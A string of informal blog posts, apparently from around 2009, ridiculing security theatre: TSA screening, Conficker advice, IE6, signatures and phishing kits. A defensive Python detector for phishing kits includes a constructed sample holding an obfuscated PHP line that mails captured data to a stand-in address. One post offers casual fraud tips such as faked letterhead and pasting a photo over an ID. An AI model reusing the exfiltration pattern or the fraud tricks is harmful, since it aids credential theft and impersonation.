As if we don’t have enough FUD already, we have some genius at ABC news advising how to make your computer less secure.
If you don’t purchase the software you could also save your files to an external hard drive and be sure to turn off any automatic updates until this super worm is killed.
Wow, that’s special. I’m wondering if whoever the technical adviser was for that article isn’t on Conficker’s payroll? See, Conficker spreads in three ways:
So the correct course of action is to do the exact opposite of what ABC suggests: Turn on automatic updates, make sure you’re up to date right now, then scan your external hard drives before trusting them.
And then of course there is this little gem:
“Well the best thing a customer can do is purchase a Norton 360, what it will do is give you complete virus protection it also spyware and adware..in addition it gives you two gigabytes of online backup so you could put your files on a backup server”, said Luke Rider, Manager of Staples.
Because when I think “security consultant”, the first thing I do is go to my nearest Staples store and ask for the manager.
Here we are in 2009 and the best the TSA presents to us on their blog is that they finally caught one piece of contraband, a bottle of lotion.
I think I’m going to go ahead and agree with the TSA’s own comment: “Thank the heavens for the TSA. Without them, a harmless bottle of lotion would have made it onto an airplane”
Good job TSA.
Here we are, two years after Internet Explorer 7 was released, at least a year since Internet Explorer 7 was pushed out as an automatic upgrade, and some ~30% of people are still using it. Heck, we’re all but on the cusp of IE8’s release, and some people are still stuck in the past with IE6!
This upgrade lag is simply unacceptable, especially to all of the web developers out there who are busy creating the content that feeds the monster you the internet.
So what’s the problem? Well, it is a real pain to make sure your Web apps work on five different browsers, but that’s just part of the game. Adding a sixth is a minor annoyance you say? Well actually no, it’s a huge pain! See, you can’t have IE6 installed on the same machine as a later IE version, so I’m stuck using an entirely separate machine that exists only for Internet Explorer 6 just to test minor site changes in IE6.
Not only that, but IE6 “supports” some non-standard features and functions that are not compatible with other browsers, and has a ton of CSS and even JavaScript incompatibilities, so things that should be dead simple in every other browser are a huge pain in IE6. The security vulnerabilities aren’t too much fun either.
For the manager types who need a bullet point list, okay, here it is. There are many reasons to upgrade your browser, but here are the most pertinent:
If you are a web developer you already know many of the headaches associated with Internet Explorer 6, so I’d encourage you to do what you can to encourage users to upgrade.
So, upgrade to what? There are a ton of alternatives to Internet Explorer 6, with the most popular browsers, all available for free, being listed below (in order of my personal preference):
So please, upgrade!
For those unfortunate souls still running Internet Explorer 6, I’ve added a handy annoying reminder to get a better browser. I’m trying to be nice, so I made it only appear on the main page, you can still wander around the site without too much pain, but please, if you see the reminder, it’s there for your own good as well as for mine.
There is a smoke/fire alarm in the kitchen. And not just any detector, it’s a super sensitive one! Note to the developer who made the decision to place it here: Don’t.
See, catching kitchen fires early is a good idea in theory, but in the real world, I’m sure my neighbours are tired of hearing about it every time I make toast. In a spectacular example of stupidity in design, it went off earlier today when I was melting butter in the microwave, and the butter wasn’t even melted yet.
I’m not talking about that blurb on the bottom of an email containing a joke, quip or quote or meaningless unenforceable legal disclaimer, but a pen to paper, might-be-worth-something-if-I-get-famous John Hancock.
Cashiers don’t confirm them when using a credit card, this is easily tested — Write “Homer Simpson” on the signature line of a Visa receipt and see if anyone notices. Even the ones that make a big show of comparing your receipt to your card don’t notice, it’s robotic, and like most things in the security world, it’s theatre.
Even more useless are signatures on faxes. I regularly fill out or create documents electronically which I am supposed to print, sign, and then either fax or mail to a company. I don’t. I have a scanned copy of my signature which I can insert into a document before printing or faxing, and haven’t once been called on it — Why would I be, it looks completely legitimate to the recipient.
And that, right there, is the problem. How is the recipient supposed to verify that the signature belongs to me? If it can’t be authenticated, how does the recipient know it’s authorized? And if it’s not authorized, what good is it?
With 15 minutes to dummy up letterhead you can get ownership to all sorts of things, from domain names to packages at the post office to using someone’s credit card, or occasionally, even initiating a wire transfer.
Cheques are not verified; unless the cheque is large or otherwise suspicious, an unsigned cheque will go through without any pain — Sure, you could dispute it, and probably get your money back, but a smart thief would be long gone before anyone noticed.
Now admittedly this is not a trivial problem to solve, and in fact it would probably take multiple layers depending on the value of the transaction, whether or not the parties are able to connect physically, and the likelihood of fraud.
Fast food is starting to get it right, no signature required for small purchases.
Some stores always ask for identification for credit card transactions, but rarely ask you to remove your ID from your wallet — Even Alberta’s rather impressively difficult to modify or reproduce, polycarbonate laser engraved identification cards are defeated if the clerk isn’t paying attention — Just paste a new picture on top and no one will notice IF the card is only inspected through a plastic holder inside a wallet. I’ve yet to be asked to remove the card from my wallet anywhere except when applying for a passport.
Weird that we trust a signature so implicitly, is it not?
All non-Europeans would need to submit biometric data before crossing Europe’s frontiers under sweeping European Union proposals to combat illegal migration, terrorism and organized crime that are to be outlined this week.
Well isn’t that fantastic. It’s a good thing no terrorist or organized crime family would ever be able to obtain a European passport. And heck, if you can’t be bothered to purchase false identification, why bother with this at all, just skip immigration and head straight for the street.
I don’t even know where to start with this story. The terrorists have won. Here are the facts as we know them; undisputed by Homeland Security at this time.
Baby flies to America for life saving surgery. Baby is a naturalized American citizen. Baby has valid papers. Baby’s nurse has valid papers. Neither set of paperwork is in question. Baby was detained and left in a locked room. Request for medical assistance was ignored, except for a “Stay calm, relax” response. Baby dies.
The officers have some questions about the mother’s paperwork, although it appears that everything is valid. The US Customs and Border Protection stamp of “APPROVAL” didn’t fool anyone, nor did the suggestion that the baby and nurse (both already cleared) could proceed to the hospital while the mother deals with whatever additional paperwork makes homeland security feel their job is worthwhile.
I’d like to take this opportunity to thank each and every member of the TSA, Homeland Security, and their associated areas. Sure, you don’t stop bombs or guns, you deport your own citizens, sometimes you even catch people playing dress-up, and now, you kill babies, you sure do a bang-up job of security.
We can now add guns to the list of things that the TSA doesn’t worry about finding.
So what do they do when their error is pointed out? Why arrest the guy who brought it to their attention, of course.
But shampoo? They’ve got that one down.
So tell me, if you discovered you were carrying a weapon after you were through security, what would you do? How about if you stumbled across something suspicious inside security? What does the TSA teach is the correct response?
From Netcraft, “Phishing kits take advantage of novice fraudsters”:
However, while the phishing kit is easy to use, an encrypted component within the kit is used to send a copy of the captured details to an additional gmail address, which belongs to the author. This will not be obvious to most fraudsters using the kit, as the relevant code is detached from the configuration file and is heavily obfuscated, requiring some effort to decode
And another article from Netcraft, and one from The Register
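As an added illustration (not code from Netcraft or from this post), here is how an analyst examining a recovered kit could surface a recipient address that the configuration file does not declare. It assumes the obfuscation is nested base64 string literals, which the quoted article does not specify; the file names, addresses and sample kit are constructed.

```python
import base64
import binascii
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Quoted string literals made only of base64 characters (assumed encoding).
B64_RE = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")

def decode_layers(text, max_depth=8):
    """Return the text plus every layer found by decoding base64 literals."""
    layers, frontier = [text], [text]
    for _ in range(max_depth):
        decoded = []
        for layer in frontier:
            for match in B64_RE.finditer(layer):
                try:
                    raw = base64.b64decode(match.group(1), validate=True)
                    decoded.append(raw.decode("utf-8"))
                except (binascii.Error, UnicodeDecodeError):
                    continue  # not base64 text, ignore it
        if not decoded:
            break
        layers.extend(decoded)
        frontier = decoded
    return layers

def hidden_recipients(files, config_name):
    """Map file name -> addresses found in any layer but absent from config."""
    declared = {e.lower() for e in EMAIL_RE.findall(files[config_name])}
    findings = {}
    for name, text in files.items():
        found = set()
        for layer in decode_layers(text):
            found.update(e.lower() for e in EMAIL_RE.findall(layer))
        if found - declared:
            findings[name] = sorted(found - declared)
    return findings

def _wrap(php):
    """Build one constructed obfuscation layer for the sample below."""
    return 'eval(base64_decode("%s"));' % base64.b64encode(php.encode()).decode()

# Constructed sample: a visible config plus a doubly wrapped second mail() call.
SAMPLE_KIT = {
    "config.php": '<?php $send_to = "operator@example.com";',
    "mailer.php": '<?php mail($send_to, "log", $captured); '
                  + _wrap(_wrap('mail("author@example.net", "copy", $captured);')),
}

if __name__ == "__main__":
    print(hidden_recipients(SAMPLE_KIT, "config.php"))
```
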
According to Microsoft, there are several mitigating factors:
• This vulnerability cannot be exploited on Microsoft Office Excel 2003 Service Pack 3, Microsoft Office Excel 2007, Microsoft Office Excel 2007 Service Pack 1, or Microsoft Excel 2008 for Mac.
• Customers who are running Microsoft Office Excel 2003 Service Pack 2 and have deployed Microsoft Office Isolated Conversion Environment (MOICE) are not affected by this vulnerability.
• The vulnerability cannot be exploited automatically through e-mail. For an attack to be successful a user must open an attachment that is sent in an e-mail message.